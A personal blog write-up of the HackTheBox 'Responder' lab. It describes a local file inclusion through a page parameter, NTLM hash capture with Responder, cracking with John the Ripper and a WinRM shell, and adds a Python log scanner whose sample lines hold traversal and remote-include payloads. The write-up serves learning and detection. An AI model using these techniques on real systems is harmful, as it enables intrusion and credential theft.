Another HTB post, this time focusing on Tier 1 machines, more specifically the Responder machine. This was perhaps the first machine that really made me wreck my remaining 2 brain cells. This machine introduced the Responder tool, local file inclusion exploit, how to capture an NTLM hash, and John the Ripper.
The HTB Tier 1 write-up is as follows:
In the second tier, you’ll delve deeper into the world of cybersecurity pen-testing, focusing on web exploitation techniques suitable for beginners. You’ll discover the basics of SQL injection, Server Side Template Injection, Remote File Inclusion, and gain a grasp of how to use Web/Reverse Shells effectively.
Finally, you’ll round out your expertise by understanding how to upload files to an S3 Bucket, providing you with a comprehensive range of skills to excel in the cybersecurity field. This tier takes you one step further in your pen-testing journey.
Tier 1 — Responder
Enumeration
Instead of using Nmap to scan all 65,535 ports, I utilise Rustscan to quickly scan all ports within a much shorter amount of time. I then use Nmap to scan the selected ports identified by Rustscan to obtain more information.
Seeing that there’s a web service being run, I attempted to access the site. However, I was met with a “Server Not Found”.
To bypass this, I only had to append the target IP and domain to my /etc/hosts file. This lets the browser resolve the hostname (unika.htb) to the target IP and send that hostname in the Host header of every HTTP request, which the web server needs in order to serve the site.
Exploitation
I ran Gobuster in an attempt to identify hidden pages within the domain, but there were none. I also attempted SQL injection in the site’s contact form, with no success. I was stumped, so it was back to Googling.
After interacting with the site for a while, I found that there were French and German versions of the site, served through a page parameter in the URL. With this page parameter, we can test whether a local file inclusion is possible by editing its value. A local file inclusion occurs when a website can be made to include a file the application never intended to serve, giving access to the local file system. A common file to test with is /windows/system32/drivers/etc/hosts.
After setting up Responder to listen for events, I edited the page parameter to point at a non-existent file on my machine’s IP. The target tries to fetch that file from my machine, Responder answers with an NTLM challenge that the client encrypts with the user’s password, and that response is the NTLM hash Responder captures.
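The two request shapes used above, a traversal to a local file and a page value pointing at an external host, are easy to spot in web-server logs. The following is an added example and not part of this write-up: a Python script that scans constructed Apache-style log lines for a page parameter carrying either pattern; the hosts, IPs and log lines are all made up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample web-server log lines (Apache combined format) for a site
# that serves language variants through a "page" query parameter. The IPs and
# paths are placeholders, not values taken from the write-up.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 1024
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=german.html HTTP/1.1" 200 1030
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 820
10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=//192.0.2.10/somefile HTTP/1.1" 500 0
10.10.14.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=%5c%5c192.0.2.10%5cshare%5cx HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')              # ../ or ..\ anywhere in the value
UNC_OR_REMOTE_RE = re.compile(r'^(\\\\|//)[^/\\]+')       # starts with \\host or //host
ABS_PATH_RE = re.compile(r'^([a-zA-Z]:[\\/]|/windows/|/etc/)', re.IGNORECASE)


def classify_page_value(value):
    """Return the reasons a 'page' value looks like a file-inclusion probe."""
    decoded = unquote(unquote(value))  # decode twice to catch double-encoded separators
    reasons = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append("path traversal")
    if UNC_OR_REMOTE_RE.match(decoded):
        # An include aimed at another host makes the server open an outbound
        # connection and, on Windows, authenticate to it (what Responder exploits).
        reasons.append("UNC/remote include")
    if ABS_PATH_RE.match(decoded):
        reasons.append("absolute path")
    return reasons


def scan_log(text, param="page"):
    """Yield (line number, raw value, reasons) for every suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)  # parse_qs URL-decodes once
        for value in query.get(param, []):
            reasons = classify_page_value(value)
            if reasons:
                findings.append((lineno, value, reasons))
    return findings


if __name__ == "__main__":
    for lineno, value, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: page={value!r} -> {', '.join(reasons)}")
```

Only the traversal and the two remote-host requests are reported; the plain french.html and german.html requests pass. Pointing this at a real log mainly needs the parameter name and log format adjusted.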
Now with this NTLM hash, we can throw this to John the Ripper to crack the hash, showing us the password in plain text.
Now that we have a set of credentials, we can attempt to interact with the WinRM service running on port 5985 (as shown in the Nmap scan). To do this, we use Evil-WinRM to start a shell.
Foothold
Now that we have a shell as the Admin user, it was only a matter of looking through the directories to locate the flag. HTB has a practice of leaving their flags in the Desktop directory, and sure enough it was located in another user’s Desktop.
Conclusion
Doing this machine for the first time was a real pain (isn’t it always), but I learnt so much. It is also really satisfying after struggling for hours and finally capturing the flag. Many more machines and much more to learn!
John